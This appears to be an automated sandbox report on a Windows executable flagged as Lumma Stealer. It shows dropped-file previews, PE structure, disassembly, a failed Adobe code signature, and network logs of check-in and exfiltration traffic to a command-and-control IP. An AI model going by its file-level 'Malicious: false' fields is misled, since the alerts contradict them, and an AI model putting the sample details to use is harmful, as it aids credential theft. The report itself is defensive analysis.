SHA-512:	E12FDC7E64F6B2AD9EF45B01EC7AB87BB1DBA4C29E727517B9690018B2EC699BDD2173CF9EAC8A0F3441C32BA8A952AB8DE2B0BF63C6C47C94F56BA92BF2CBE3
Malicious:	false
Preview:	Set KiQOKZsoLEOrUiqMhwDWusbGrYTQGELUMbgNr=o..yGztGoqeXmjwfXwjaJpKMyABuS=sbThJbknfNhRnrVVsxCcXKlVrTy..ZuRXNgJEtjC=tmMmySLHQlpiEvWHhXpPa..npVfrpzsQtRY=bXKPkobgPWKzsses..rMkXqDDQOBgn=yfFymJCiXHUSJjkVM..sZJwyNzvxuZvGpPcRxOkRzOZyyd=sdaUeJXmKtlS..rgvoAwLrgcRiAqXkJVqvgytO=xXjdKNpVmOya..ErFeeUAMBIZhqolvbXpHeurmMD=HkqkSTRsWRjephaTgjeKEZm..QVKPnqyfmj=ABbizoRgEkVqzJhPjKTrHMYxXpe..WLXDWzRsRyJBNLURVUdyklSFFpj=CellyYaTharZSVYiqafWRumeS..Set HLSaXMirOOVncPawDCRdhfjLEhUfXvDosodHqVcdSOupjBXAD=v..XlBKsniNJSSyakNuhnLqH=AnnprnedzLiT..XQbYoTiLbqJNYmxJwSPVQK=jocILznuXmE..dPmCiAcenOctZHGaTaYQjMlQNk=sZTLgzJtTBfIcxHFbM..IrNuhFBOCDFJOVrr=EriKdDMQDKD..EiMtvCzESGyNEuAgSB=sdEqxEGamqdKUYzYvSFszKnl..XxuprnYeYktqiamQpTECWkPkotvhp=HSzevlApvCaHWMgXg..yBlRUIeMEUwZeKSFEjG=WgdqvwlggeW..PWiIoQXKqJFFov=HOsoedpDRlpxTnNnCXQl..DlvOgWyjILRq=CmXUUUFzdbYctjjkrHaj..Set rEUxNxtdonaxaVgAIeWFMhMnalJSqFrmNumVrm=q..AroZGwMdYLcFcHIQRve=KkfCcSGjvaboVvtIyNRdn..UflnrubIrGbEOgNFD=cAUFhjJYCqLrELtssZaXOAPNf..LsIPVmlrVXnfeXOtDvXqwLmvXO=FZULudv

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rounds

Download File

Process:	C:\Users\user\Desktop\80441fcf.exe
File Type:	data
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	6.3259145507467816
Encrypted:	false
SSDEEP:	6144:AB+xHFq9O0lHPOGUWLhxjRYmFqZvEAOz04pmdVq:AB+X0lHPOGNnlMZce4wdVq
MD5:	12073C3269A07BF6BC9CD8B66462FC0F
SHA1:	F3A762EF9933B82AEAE112B09A231F140ED2363F
SHA-256:	12221E02174A5148DD215E1B1DCC81E47704BE82E8DBC4E93EB9A664E582CBDA
SHA-512:	E0C586EBB4B18A45345E293189FF52E83D974F52A76C0CD614AC28C6D50288E84F78FC28ADEEB0D10ADF3BAE0A21789E59698E86A96012C2901A32406ACEB206
Malicious:	false
Preview:	....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..QQ.E.SVW.@..0.~..u..6.}.........'.3.C.._.......tA.~..u;.j....z?...E...U..m..]..E..]..L....E.......D{....~...._..._^3.[....U..E..@....y..u....y..VWu...@..P..H.I...t.3.G..3..u....4....>3._.F.....^]...U..QQ.E.SVW.@..0.~..u..6.}.........'.3.C.._........tF9^.t5.~..t/.....>...E...U..m..]..E..]..z....E.......Dz........_..._^3.[....U..E..@....x..u....x..t.V.u....z....&..F.....^3.]...U..E..@....y..u....e.....u.V.u....B....&..F.....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..E..@....x..u....x..t.V.u.........&..F.....^3.]...U..QQ.E.V.@....o...QQ..$.....u.......]......E.3....F.....^....U..QQSV.u.3.CW.N...9X.u@.I.9Y.u8.O.....t/.N..1.I..>.......5.......u.....9....^..>.....V..........tR.J.......tF......t=.N....I..............VWRP.;...}............G......7._..?.F..H..0.}...QQ..$...q...QQ..$.\....u.......]......E....F....._^3.[....U..E.VW.@.....=...u......i....>3._.F.....^]...U....S.].VW...E

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.928729653791834
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	80441fcf.exe
File size:	949'700 bytes
MD5:	d3c1c1a07fc43292e7e29e57c752d4c5
SHA1:	378c2bf9ece8f5db60f56fda569d24c413d64b55
SHA256:	80441fcf20760b653d36c4bc78c58c9e05b190e811767c7ed523a904e53b0684
SHA512:	d16e8e1da988314de0a130d67fe9f8eacd4c49084ed8e122ad11b2a8e0401fc1e1d1bd48f1cacd9742a447719390d93b5c1d32ef366502553a162740f3978adb
SSDEEP:	12288:SdPEXbCuPYDfFyTxAgY1jggLXKHeH82f3Mp6ot7amxgtxBR3Z2txznbQb0YNDSry:SlEXbCjFjgYlyFW3Mam6txBe91fPQ+Te
TLSH:	3815232279E28035D7630A704D74FEB10AFDF26A0F60E95B13948A560FF9AC3D35A15B
File Content Preview:	MZ`.....................@...............................................!..L.!Require Windows..$W%>=.DPn.DPn.DPn.<.n.DPn./To.DPn./Vo.DPnA,Uo:DPnA,To.DPnA,So.DPn./Qo.DPn.DQn.DPn.-So.DPn.-To.DPn.-Uo"DPn.-.n.DPn.D.n.DPn.-Ro.DPnRich.DPn........PE..L...8..V...

File Icon


Icon Hash:	b5b06a645278f902

Static PE Info

General

Entrypoint:	0x41aaa5
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x56C8BD38 [Sat Feb 20 19:23:36 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2f3a7c5c46373967696674b9a526bbc2

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	03/11/2023 01:00:00 05/11/2025 00:59:59
Subject Chain	CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	464C015DAA50884AB4DD5502E6B164B0
Thumbprint SHA-1:	96B7B1EF175BBA4BDE33A05402134289B28B5BCB
Thumbprint SHA-256:	ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
Serial:	0D1A340F78D7D000E089FDBAAD6522DF

Entrypoint Preview

Instruction
call 00007FA4A9610CECh
jmp 00007FA4A9610479h
push ebp
mov ebp, esp
and dword ptr [004219C0h], 00000000h
sub esp, 24h
push ebx
xor ebx, ebx
inc ebx
or dword ptr [00421360h], ebx
push 0000000Ah
call 00007FA4A9611006h
test eax, eax
je 00007FA4A9610772h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
or dword ptr [00421360h], 02h
xor ecx, ecx
push esi
push edi
mov dword ptr [004219C0h], ebx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
or eax, dword ptr [ebp-08h]
or eax, edi
mov dword ptr [ebx+04h], esi
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007FA4A9610645h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FA4A9610625h
cmp eax, 00020660h
je 00007FA4A961061Eh
cmp eax, 00020670h
je 00007FA4A9610617h
cmp eax, 00030650h
je 00007FA4A9610610h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1f550	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x4dc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xe5424	0x29a0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1e960	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1e9b8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1c000	0x338	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1aab0	0x1ac00	e5384716f1aca524e830c82e12bcafdd	False	0.6011244158878505	data	6.645186082569821	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x47d2	0x4800	3380b6b89ece8b928ff8e68cc2eb3a82	False	0.4224717881944444	data	5.446009145501002	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21000	0x2d28	0x600	8486e9afd6dee1f33b06a712cd419456	False	0.376953125	data	3.776398346677752	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24000	0x4dc0	0x4e00	804b94d9f52ae619a344351ccb0c9412	False	0.5765725160256411	data	6.271203950040357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x241a8	0x171d	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced			1.0018590501943552
RT_ICON	0x258c8	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792			0.3668633034987795
RT_ICON	0x27f30	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.6019503546099291
RT_GROUP_ICON	0x28398	0x30	data			0.8541666666666666
RT_VERSION	0x283c8	0x370	data			0.46136363636363636
RT_MANIFEST	0x28738	0x309	ASCII text			0.5353925353925354
RT_MANIFEST	0x28a44	0x37c	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (832), with CRLF line terminators	English	United States	0.5022421524663677

Imports

DLL	Import
COMCTL32.dll
KERNEL32.dll	SetLastError, Sleep, CreateThread, GetExitCodeThread, GetLocalTime, SystemTimeToFileTime, GetEnvironmentVariableW, ExpandEnvironmentStringsW, SetCurrentDirectoryW, GetCurrentDirectoryW, CompareFileTime, CreateDirectoryW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetFileAttributesW, RemoveDirectoryW, GetTempPathW, GetSystemTimeAsFileTime, lstrcmpW, lstrcmpiW, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, GetLocaleInfoW, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetSystemDefaultLCID, GetCommandLineW, SetEnvironmentVariableW, CreateFileW, GetDriveTypeW, WriteFile, GetTickCount, GetModuleFileNameW, GetModuleHandleW, LoadLibraryA, GetCurrentThreadId, TerminateThread, SuspendThread, ResumeThread, GetSystemDirectoryW, LoadResource, LockResource, GetProcAddress, MulDiv, FormatMessageW, lstrcpyW, FindResourceA, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, VirtualAlloc, VirtualFree, GetFileSize, ReadFile, SetEndOfFile, SetFilePointer, SetFileTime, GetFileInformationByHandle, WaitForMultipleObjects, InitializeCriticalSection, SetEvent, ResetEvent, CreateEventW, RtlUnwind, RaiseException, EncodePointer, VirtualQuery, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetCurrentProcess, InitializeSListHead, GetCurrentProcessId, QueryPerformanceCounter, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, IsProcessorFeaturePresent, SetFileAttributesW, WaitForSingleObject, GetLastError, CloseHandle, lstrlenW, LocalFree, TerminateProcess
USER32.dll	ReleaseDC, GetClientRect, MessageBeep, ClientToScreen, PtInRect, GetWindowLongW, SetWindowLongW, GetWindow, SetWindowsHookExW, UnhookWindowsHookEx, CallNextHookEx, GetWindowDC, CallWindowProcW, DrawIconEx, SystemParametersInfoW, SetFocus, DefWindowProcW, wvsprintfW, MessageBoxA, GetKeyState, GetParent, ScreenToClient, GetDC, DrawTextW, EnableMenuItem, GetSystemMenu, GetSystemMetrics, EnableWindow, LoadIconW, KillTimer, SendMessageW, EndDialog, wsprintfW, GetDlgItem, DialogBoxIndirectParamW, SetWindowPos, ShowWindow, LoadImageW, IsWindow, CharUpperW, SetWindowTextW, GetWindowTextW, GetWindowTextLengthW, SetTimer, GetWindowRect
GDI32.dll	DeleteObject, GetDeviceCaps, SelectObject, GetObjectW, CreateFontIndirectW
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	CoCreateInstance, CoInitializeEx
OLEAUT32.dll	SysAllocStringLen, VariantClear
api-ms-win-crt-convert-l1-1-0.dll	_wtol
api-ms-win-crt-string-l1-1-0.dll	wcscmp, strcpy_s, _wcsnicmp, wcsncpy, wcsncmp, strncpy
api-ms-win-crt-runtime-l1-1-0.dll	_configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, abort, _crt_atexit, _cexit, _beginthreadex, _set_app_type, terminate, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, _set_new_handler, __p___argc, __p___argv, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _register_onexit_function, _controlfp_s
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, _callnewh, free, malloc, calloc
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode, __p__commode
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-24T21:05:21.384801+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	64747	443	192.168.2.5	172.67.163.54
2024-07-24T21:05:14.060717+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49731	443	192.168.2.5	172.67.163.54
2024-07-24T21:05:15.361117+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	49733	443	192.168.2.5	172.67.163.54
2024-07-24T21:05:16.915861+0200	TCP	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	49735	443	192.168.2.5	172.67.163.54

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 21:05:12.649203062 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:12.649235964 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:12.649385929 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:12.650464058 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:12.650476933 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:13.152409077 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:13.152513981 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:13.154134989 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:13.154145956 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:13.154392958 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:13.208822012 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:13.377413988 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:13.377413988 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:13.377582073 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.060735941 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.060832977 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.060899973 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.230267048 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.230295897 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.230318069 CEST	49731	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.230324030 CEST	443	49731	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.337238073 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.337265015 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.337328911 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.337841988 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.337852001 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.883960009 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.884094954 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.893448114 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.893466949 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.893827915 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:14.895114899 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.895143032 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:14.895195007 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.361188889 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.362690926 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.362730026 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.362740993 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.365747929 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.365797043 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.365808010 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.369223118 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.369254112 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.369259119 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.369267941 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.369304895 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.372687101 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.376065969 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.376121044 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.376133919 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.378516912 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.378565073 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.378572941 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.427427053 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.459743977 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.460843086 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.460896015 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.460993052 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.461009026 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.461033106 CEST	49733	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.461039066 CEST	443	49733	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.682904005 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.682941914 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:15.683023930 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.683332920 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:15.683346033 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.178339005 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.178483963 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.179778099 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.179789066 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.180058002 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.181732893 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.181850910 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.181875944 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.915829897 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.915921926 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:16.916049004 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.916167021 CEST	49735	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:16.916188002 CEST	443	49735	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.158729076 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.158776999 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.158901930 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.159302950 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.159315109 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.632770061 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.632935047 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.634124041 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.634141922 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.634412050 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.635629892 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.635780096 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.635812998 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:17.635874033 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:17.635883093 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:18.124378920 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:18.124505997 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:18.124615908 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:18.124789000 CEST	49736	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:18.124806881 CEST	443	49736	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:18.509542942 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:18.509627104 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:18.509704113 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:18.510082006 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:18.510108948 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.019655943 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.019759893 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.021028042 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.021039009 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.021292925 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.022532940 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.022707939 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.022741079 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.022803068 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.022813082 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.659312010 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.659543991 CEST	443	64745	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:19.659573078 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:19.659641027 CEST	64745	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.422009945 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.422060966 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:20.422123909 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.422489882 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.422506094 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:20.884295940 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:20.884371042 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.885687113 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.885695934 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:20.885932922 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:20.887182951 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.887300014 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:20.887306929 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:21.384886980 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:21.385128975 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:21.385152102 CEST	443	64747	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:21.385231972 CEST	64747	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:21.842416048 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:21.842526913 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:21.842614889 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:21.842931032 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:21.842959881 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.368891954 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.368983984 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.370352030 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.370372057 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.370666981 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.371969938 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.372572899 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.372610092 CEST	443	64748	172.67.163.54	192.168.2.5
Jul 24, 2024 21:05:22.372724056 CEST	64748	443	192.168.2.5	172.67.163.54
Jul 24, 2024 21:05:22.372756004 CEST	443	64748	172.67.163.54	192.168.2.5
